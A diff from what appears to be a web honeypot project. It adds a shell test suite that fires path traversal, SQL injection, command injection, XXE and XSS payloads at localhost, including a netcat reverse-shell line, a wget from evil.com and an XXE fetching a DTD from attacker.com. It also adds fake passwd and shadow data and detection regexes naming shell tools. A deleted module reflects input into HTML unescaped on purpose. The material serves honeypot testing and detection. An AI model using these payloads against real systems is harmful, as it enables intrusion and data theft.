@@ -1,73 +0,0 @@
#!/usr/bin/env python3
import re
from typing import Optional
from wordlists import get_wordlists
def detect_xss_pattern(input_string: str) -> bool:
if not input_string:
return False
wl = get_wordlists()
xss_pattern = wl.attack_patterns.get("xss_attempt", "")
if not xss_pattern:
xss_pattern = r"(<script|</script|javascript:|onerror=|onload=|onclick=|<iframe|<img|<svg|eval\(|alert\()"
return bool(re.search(xss_pattern, input_string, re.IGNORECASE))
def generate_xss_response(input_data: dict) -> str:
xss_detected = False
reflected_content = []
for key, value in input_data.items():
if detect_xss_pattern(value):
xss_detected = True
reflected_content.append(f"<p><strong>{key}:</strong> {value}</p>")
if xss_detected:
html = f"""
<!DOCTYPE html>
<html>
<head>
<title>Submission Received</title>
<style>
body {{ font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }}
.success {{ background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }}
h2 {{ color: #155724; }}
p {{ margin: 10px 0; }}
</style>
</head>
<body>
<div class="success">
<h2>Thank you for your submission!</h2>
<p>We have received your information:</p>
{''.join(reflected_content)}
<p><em>We will get back to you shortly.</em></p>
</div>
</body>
</html>
"""
return html
return """
<!DOCTYPE html>
<html>
<head>
<title>Submission Received</title>
<style>
body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; }
.success { background: #d4edda; padding: 20px; border-radius: 8px; border: 1px solid #c3e6cb; }
h2 { color: #155724; }
</style>
</head>
<body>
<div class="success">
<h2>Thank you for your submission!</h2>
<p>Your message has been received and we will respond soon.</p>
</div>
</body>
</html>
"""

View File

@@ -1,3 +0,0 @@
#!/bin/env bash
# -s is for silent (no progress bar) | -I is to get the headers | grep is to find only the Server line
curl -s -I http://localhost:5000 | grep "Server:"

View File

@@ -1,20 +0,0 @@
#!/bin/bash
TARGET="http://localhost:5000"
echo "=== Testing Path Traversal ==="
curl -s "$TARGET/../../etc/passwd"
echo -e "\n=== Testing SQL Injection ==="
curl -s -X POST "$TARGET/login" -d "user=' OR 1=1--"
echo -e "\n=== Testing XSS ==="
curl -s -X POST "$TARGET/comment" -d "msg=<script>alert(1)</script>"
echo -e "\n=== Testing Common Probes ==="
curl -s "$TARGET/.env"
curl -s "$TARGET/wp-admin/"
echo -e "\n=== Testing Shell Injection ==="
curl -s -X POST "$TARGET/ping" -d "host=127.0.0.1; cat /etc/passwd"
echo -e "\n=== Done ==="

338
tests/test_all_attacks.sh Normal file
View File

@@ -0,0 +1,338 @@
#!/bin/bash
# Test script for all attack types in Krawl honeypot
# Tests: Path Traversal, XXE, Command Injection, SQL Injection, XSS
# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# Server configuration
SERVER_URL="${SERVER_URL:-http://localhost:1234}"
SLEEP_TIME="${SLEEP_TIME:-0.5}"
echo -e "${BLUE}======================================${NC}"
echo -e "${BLUE} Krawl Honeypot Attack Test Suite${NC}"
echo -e "${BLUE}======================================${NC}"
echo ""
echo -e "${YELLOW}Testing server: ${SERVER_URL}${NC}"
echo ""
# Function to print test header
test_header() {
echo ""
echo -e "${GREEN}[TEST]${NC} $1"
echo "----------------------------------------"
}
# Function to print request info
request_info() {
echo -e "${YELLOW}Request:${NC} $1"
}
# Function to print response
response_info() {
echo -e "${BLUE}Response (first 200 chars):${NC}"
echo "$1" | head -c 200
echo ""
echo ""
}
#############################################
# PATH TRAVERSAL ATTACKS
#############################################
test_header "Path Traversal - /etc/passwd"
request_info "GET /../../../../etc/passwd"
RESPONSE=$(curl -s "${SERVER_URL}/../../../../etc/passwd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - /etc/shadow"
request_info "GET /../../../etc/shadow"
RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/shadow")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - Windows path"
request_info "GET /..\\..\\..\\windows\\system32\\config\\sam"
RESPONSE=$(curl -s "${SERVER_URL}/..\\..\\..\\windows\\system32\\config\\sam")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - URL encoded"
request_info "GET /%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
RESPONSE=$(curl -s "${SERVER_URL}/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - /proc/self/environ"
request_info "GET /../../../../proc/self/environ"
RESPONSE=$(curl -s "${SERVER_URL}/../../../../proc/self/environ")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Path Traversal - config file"
request_info "GET /../../config.php"
RESPONSE=$(curl -s "${SERVER_URL}/../../config.php")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# COMMAND INJECTION ATTACKS
#############################################
test_header "Command Injection - cmd parameter with id"
request_info "GET /test?cmd=id"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - exec parameter with whoami"
request_info "GET /api/search?exec=whoami"
RESPONSE=$(curl -s "${SERVER_URL}/api/search?exec=whoami")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - command parameter with ls"
request_info "GET /admin?command=ls -la"
RESPONSE=$(curl -s "${SERVER_URL}/admin?command=ls%20-la")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - pipe with whoami"
request_info "GET /search?q=test|whoami"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=test|whoami")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - semicolon with id"
request_info "GET /page?id=1;id"
RESPONSE=$(curl -s "${SERVER_URL}/page?id=1;id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - double ampersand with cat"
request_info "GET /view?file=data.txt&&cat /etc/passwd"
RESPONSE=$(curl -s "${SERVER_URL}/view?file=data.txt&&cat%20/etc/passwd")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - command substitution"
request_info "GET /test?\$(whoami)"
RESPONSE=$(curl -s "${SERVER_URL}/test?\$(whoami)")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - backticks"
request_info "GET /test?\`id\`"
RESPONSE=$(curl -s "${SERVER_URL}/test?\`id\`")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - /bin/bash"
request_info "GET /shell?cmd=/bin/bash -c 'id'"
RESPONSE=$(curl -s "${SERVER_URL}/shell?cmd=/bin/bash%20-c%20'id'")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - netcat"
request_info "GET /test?cmd=nc -e /bin/sh 192.168.1.1 4444"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=nc%20-e%20/bin/sh%20192.168.1.1%204444")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - wget"
request_info "GET /test?cmd=wget http://evil.com/malware.sh"
RESPONSE=$(curl -s "${SERVER_URL}/test?cmd=wget%20http://evil.com/malware.sh")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Command Injection - uname -a"
request_info "GET /info?cmd=uname -a"
RESPONSE=$(curl -s "${SERVER_URL}/info?cmd=uname%20-a")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# SQL INJECTION ATTACKS
#############################################
test_header "SQL Injection - single quote"
request_info "GET /user?id=1'"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - OR 1=1"
request_info "GET /login?user=admin' OR '1'='1"
RESPONSE=$(curl -s "${SERVER_URL}/login?user=admin'%20OR%20'1'='1")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - UNION SELECT"
request_info "GET /product?id=1 UNION SELECT username,password FROM users"
RESPONSE=$(curl -s "${SERVER_URL}/product?id=1%20UNION%20SELECT%20username,password%20FROM%20users")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - SQL comment"
request_info "GET /search?q=test'--"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=test'--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - time-based blind"
request_info "GET /user?id=1' AND SLEEP(5)--"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1'%20AND%20SLEEP(5)--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - information_schema"
request_info "GET /search?q=1' UNION SELECT table_name FROM information_schema.tables--"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=1'%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - stacked queries"
request_info "GET /user?id=1; DROP TABLE users--"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;%20DROP%20TABLE%20users--")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "SQL Injection - POST request"
request_info "POST /login with username=admin' OR '1'='1"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/login" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "username=admin' OR '1'='1&password=anything")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# XXE INJECTION ATTACKS
#############################################
test_header "XXE Injection - file:///etc/passwd"
request_info "POST /api/xml with XXE payload"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/xml" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XXE Injection - external entity"
request_info "POST /api/process with external entity"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "file:///etc/shadow">
]>
<foo>&bar;</foo>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/process" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XXE Injection - parameter entity"
request_info "POST /api/data with parameter entity"
XXE_PAYLOAD='<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>&send;</data>'
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/data" \
-H "Content-Type: application/xml" \
-d "$XXE_PAYLOAD")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# XSS ATTACKS
#############################################
test_header "XSS - script tag"
request_info "POST /api/contact with <script>alert('XSS')</script>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"Test","email":"test@test.com","message":"<script>alert(\"XSS\")</script>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - img onerror"
request_info "POST /api/contact with <img src=x onerror=alert('XSS')>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"<img src=x onerror=alert(1)>","email":"test@test.com","message":"Test"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - javascript protocol"
request_info "GET /search?q=javascript:alert('XSS')"
RESPONSE=$(curl -s "${SERVER_URL}/search?q=javascript:alert('XSS')")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - svg onload"
request_info "POST /api/comment with <svg onload=alert(1)>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/comment" \
-H "Content-Type: application/json" \
-d '{"comment":"<svg onload=alert(1)>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "XSS - iframe"
request_info "POST /api/contact with <iframe src=javascript:alert('XSS')>"
RESPONSE=$(curl -s -X POST "${SERVER_URL}/api/contact" \
-H "Content-Type: application/json" \
-d '{"name":"Test","email":"test@test.com","message":"<iframe src=javascript:alert(1)>"}')
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# COMBINED ATTACKS
#############################################
test_header "Combined - Command Injection via SQL parameter"
request_info "GET /user?id=1;id"
RESPONSE=$(curl -s "${SERVER_URL}/user?id=1;id")
response_info "$RESPONSE"
sleep $SLEEP_TIME
test_header "Combined - Path Traversal + Command Injection"
request_info "GET /../../../etc/passwd?cmd=cat"
RESPONSE=$(curl -s "${SERVER_URL}/../../../etc/passwd?cmd=cat")
response_info "$RESPONSE"
sleep $SLEEP_TIME
#############################################
# SUMMARY
#############################################
echo ""
echo -e "${BLUE}======================================${NC}"
echo -e "${BLUE} Test Suite Completed${NC}"
echo -e "${BLUE}======================================${NC}"
echo ""
echo -e "${GREEN}All attack types have been tested.${NC}"
echo -e "${YELLOW}Check the server logs for detection confirmations.${NC}"
echo -e "${YELLOW}Check the dashboard at ${SERVER_URL}/test/dashboard for statistics.${NC}"
echo ""
echo -e "${BLUE}To view the dashboard in browser:${NC}"
echo -e " open ${SERVER_URL}/test/dashboard"
echo ""
echo -e "${BLUE}To check attack types via API:${NC}"
echo -e " curl ${SERVER_URL}/test/api/attack-types"
echo ""

View File

@@ -1,78 +0,0 @@
#!/bin/bash
# Test script for SQL injection honeypot endpoints
BASE_URL="http://localhost:5000"
echo "========================================="
echo "Testing SQL Injection Honeypot Endpoints"
echo "========================================="
echo ""
# Test 1: Normal query
echo "Test 1: Normal GET request to /api/search"
curl -s "${BASE_URL}/api/search?q=test" | head -20
echo ""
echo "---"
echo ""
# Test 2: SQL injection with single quote
echo "Test 2: SQL injection with single quote"
curl -s "${BASE_URL}/api/search?id=1'" | head -20
echo ""
echo "---"
echo ""
# Test 3: UNION-based injection
echo "Test 3: UNION-based SQL injection"
curl -s "${BASE_URL}/api/search?id=1%20UNION%20SELECT%20*" | head -20
echo ""
echo "---"
echo ""
# Test 4: Boolean-based injection
echo "Test 4: Boolean-based SQL injection"
curl -s "${BASE_URL}/api/sql?user=admin'%20OR%201=1--" | head -20
echo ""
echo "---"
echo ""
# Test 5: Comment-based injection
echo "Test 5: Comment-based SQL injection"
curl -s "${BASE_URL}/api/database?q=test'--" | head -20
echo ""
echo "---"
echo ""
# Test 6: Time-based injection
echo "Test 6: Time-based SQL injection"
curl -s "${BASE_URL}/api/search?id=1%20AND%20SLEEP(5)" | head -20
echo ""
echo "---"
echo ""
# Test 7: POST request with SQL injection
echo "Test 7: POST request with SQL injection"
curl -s -X POST "${BASE_URL}/api/search" -d "username=admin'%20OR%201=1--&password=test" | head -20
echo ""
echo "---"
echo ""
# Test 8: Information schema query
echo "Test 8: Information schema injection"
curl -s "${BASE_URL}/api/sql?table=information_schema.tables" | head -20
echo ""
echo "---"
echo ""
# Test 9: Stacked queries
echo "Test 9: Stacked queries injection"
curl -s "${BASE_URL}/api/database?id=1;DROP%20TABLE%20users" | head -20
echo ""
echo "---"
echo ""
echo "========================================="
echo "Tests completed!"
echo "Check logs for detailed attack detection"
echo "========================================="

View File

@@ -183,8 +183,118 @@
".git/", ".git/",
"keys/", "keys/",
"credentials/" "credentials/"
],
"fake_files": [
{"name": "settings.conf", "size_min": 1024, "size_max": 8192, "perms": "-rw-r--r--"},
{"name": "database.sql", "size_min": 10240, "size_max": 102400, "perms": "-rw-r--r--"},
{"name": ".htaccess", "size_min": 256, "size_max": 1024, "perms": "-rw-r--r--"},
{"name": "README.md", "size_min": 512, "size_max": 2048, "perms": "-rw-r--r--"}
],
"fake_directories": [
{"name": "config", "size": "4096", "perms": "drwxr-xr-x"},
{"name": "backup", "size": "4096", "perms": "drwxr-xr-x"},
{"name": "logs", "size": "4096", "perms": "drwxrwxr-x"},
{"name": "data", "size": "4096", "perms": "drwxr-xr-x"}
] ]
}, },
"fake_passwd": {
"system_users": [
"root:x:0:0:root:/root:/bin/bash",
"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
"bin:x:2:2:bin:/bin:/usr/sbin/nologin",
"sys:x:3:3:sys:/dev:/usr/sbin/nologin",
"sync:x:4:65534:sync:/bin:/bin/sync",
"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
"backup:x:34:34:backup:/var/backups:/usr/sbin/nologin",
"mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false",
"sshd:x:109:65534::/run/sshd:/usr/sbin/nologin"
],
"uid_min": 1000,
"uid_max": 2000,
"gid_min": 1000,
"gid_max": 2000,
"shells": ["/bin/bash", "/bin/sh", "/usr/bin/zsh"]
},
"fake_shadow": {
"system_entries": [
"root:$6$rounds=656000$fake_salt_here$fake_hash_data:19000:0:99999:7:::",
"daemon:*:19000:0:99999:7:::",
"bin:*:19000:0:99999:7:::",
"sys:*:19000:0:99999:7:::",
"www-data:*:19000:0:99999:7:::"
],
"hash_prefix": "$6$rounds=656000$",
"salt_length": 16,
"hash_length": 86
},
"xxe_responses": {
"file_access": {
"template": "<?xml version=\"1.0\"?>\n<response>\n <status>success</status>\n <data>{content}</data>\n</response>"
},
"entity_processed": {
"template": "<?xml version=\"1.0\"?>\n<response>\n <status>success</status>\n <message>Entity processed successfully</message>\n <entity_value>{entity_value}</entity_value>\n</response>",
"entity_values": [
"fake_entity_content_12345",
"external_entity_processed",
"system_entity_loaded",
"dtd_entity_resolved"
]
},
"error": {
"template": "<?xml version=\"1.0\"?>\n<response>\n <status>error</status>\n <message>{message}</message>\n</response>",
"messages": [
"External entity processing disabled",
"Entity expansion limit exceeded",
"Security policy violation"
]
},
"default_content": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin"
},
"command_outputs": {
"id": [
"uid={uid}(www-data) gid={gid}(www-data) groups={gid}(www-data)",
"uid={uid}(nginx) gid={gid}(nginx) groups={gid}(nginx)",
"uid={uid}(apache) gid={gid}(apache) groups={gid}(apache)"
],
"whoami": ["www-data", "nginx", "apache", "webapp", "nobody"],
"uname": [
"Linux webserver 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux",
"Linux app-server 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 GNU/Linux",
"Linux prod-server 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux"
],
"pwd": [
"/var/www/html",
"/home/webapp/public_html",
"/usr/share/nginx/html",
"/opt/app/public"
],
"ls": [
["index.php", "config.php", "uploads", "assets", "README.md", ".htaccess", "admin"],
["app.js", "package.json", "node_modules", "public", "views", "routes"],
["index.html", "css", "js", "images", "data", "api"]
],
"cat_config": "<?php\n// Configuration file\n$db_host = 'localhost';\n$db_user = 'webapp';\n$db_pass = 'fake_password';\n?>",
"network_commands": [
"bash: wget: command not found",
"curl: (6) Could not resolve host: example.com",
"Connection timeout",
"bash: nc: command not found",
"Downloaded {size} bytes"
],
"generic": [
"sh: 1: syntax error: unexpected end of file",
"Command executed successfully",
"",
"/bin/sh: {num}: not found",
"bash: command not found"
],
"uid_min": 1000,
"uid_max": 2000,
"gid_min": 1000,
"gid_max": 2000,
"download_size_min": 100,
"download_size_max": 10000
},
"error_codes": [ "error_codes": [
400, 400,
401, 401,
@@ -353,14 +463,13 @@
} }
}, },
"attack_patterns": { "attack_patterns": {
"path_traversal": "(\\.\\.|%2e%2e|%252e%252e|\\.{2,}|%c0%ae|%c1%9c)", "path_traversal": "(\\.\\.|%2e%2e|%252e|/etc/passwd|/etc/shadow|\\.\\.\\\\/|\\.\\./|/windows/system32|c:\\\\windows|/proc/self|\\.\\.\\.%2f|\\.\\.\\.%5c|etc/passwd|etc/shadow)",
"sql_injection": "('|\"|`|--|#|/\\*|\\*/|\\bunion\\b|\\bunion\\s+select\\b|\\bor\\b.*=.*|\\band\\b.*=.*|'.*or.*'.*=.*'|\\bsleep\\b|\\bwaitfor\\b|\\bdelay\\b|\\bbenchmark\\b|;.*select|;.*drop|;.*insert|;.*update|;.*delete|\\bexec\\b|\\bexecute\\b|\\bxp_cmdshell\\b|information_schema|table_schema|table_name)", "sql_injection": "('|\"|`|--|#|/\\*|\\*/|\\bunion\\b|\\bunion\\s+select\\b|\\bor\\b.*=.*|\\band\\b.*=.*|'.*or.*'.*=.*'|\\bsleep\\b|\\bwaitfor\\b|\\bdelay\\b|\\bbenchmark\\b|;.*select|;.*drop|;.*insert|;.*update|;.*delete|\\bexec\\b|\\bexecute\\b|\\bxp_cmdshell\\b|information_schema|table_schema|table_name)",
"xss_attempt": "(<script|</script|javascript:|onerror=|onload=|onclick=|onmouseover=|onfocus=|onblur=|<iframe|<img|<svg|<embed|<object|<body|<input|eval\\(|alert\\(|prompt\\(|confirm\\(|document\\.|window\\.|<style|expression\\(|vbscript:|data:text/html)", "xss_attempt": "(<script|</script|javascript:|onerror=|onload=|onclick=|onmouseover=|onfocus=|onblur=|<iframe|<img|<svg|<embed|<object|<body|<input|eval\\(|alert\\(|prompt\\(|confirm\\(|document\\.|window\\.|<style|expression\\(|vbscript:|data:text/html)",
"shell_injection": "(\\||;|`|\\$\\(|&&|\\bnc\\b|\\bnetcat\\b|\\bwget\\b|\\bcurl\\b|/bin/bash|/bin/sh|cmd\\.exe)",
"lfi_rfi": "(file://|php://|expect://|data://|zip://|phar://|/etc/passwd|/etc/shadow|/proc/self|c:\\\\windows)", "lfi_rfi": "(file://|php://|expect://|data://|zip://|phar://|/etc/passwd|/etc/shadow|/proc/self|c:\\\\windows)",
"xxe_injection": "(<!ENTITY|<!DOCTYPE|SYSTEM|PUBLIC)", "xxe_injection": "(<!ENTITY|<!DOCTYPE|SYSTEM\\s+[\"']|PUBLIC\\s+[\"']|&\\w+;|file://|php://filter|expect://)",
"ldap_injection": "(\\*\\)|\\(\\||\\(&)", "ldap_injection": "(\\*\\)|\\(\\||\\(&)",
"command_injection": "(&&|\\|\\||;|\\$\\{|\\$\\(|`)" "command_injection": "(cmd=|exec=|command=|execute=|system=|ping=|host=|&&|\\|\\||;|\\$\\{|\\$\\(|`|\\bid\\b|\\bwhoami\\b|\\buname\\b|\\bcat\\b|\\bls\\b|\\bpwd\\b|\\becho\\b|\\bwget\\b|\\bcurl\\b|\\bnc\\b|\\bnetcat\\b|\\bbash\\b|\\bsh\\b|\\bps\\b|\\bkill\\b|\\bchmod\\b|\\bchown\\b|\\bcp\\b|\\bmv\\b|\\brm\\b|/bin/bash|/bin/sh|cmd\\.exe|/bin/|/usr/bin/|/sbin/)"
}, },
"server_headers": [ "server_headers": [
"Apache/2.4.41 (Ubuntu)", "Apache/2.4.41 (Ubuntu)",
@@ -369,5 +478,46 @@
"cloudflare", "cloudflare",
"AmazonS3", "AmazonS3",
"gunicorn/20.1.0" "gunicorn/20.1.0"
] ],
"suspicious_patterns": [
"bot",
"crawler",
"spider",
"scraper",
"curl",
"wget",
"python-requests",
"scanner",
"nikto",
"sqlmap",
"nmap",
"masscan",
"nessus",
"acunetix",
"burp",
"zap",
"w3af",
"metasploit",
"nuclei",
"gobuster",
"dirbuster"
],
"credential_fields": {
"username_fields": [
"username",
"user",
"login",
"email",
"log",
"userid",
"account"
],
"password_fields": [
"password",
"pass",
"passwd",
"pwd",
"passphrase"
]
}
} }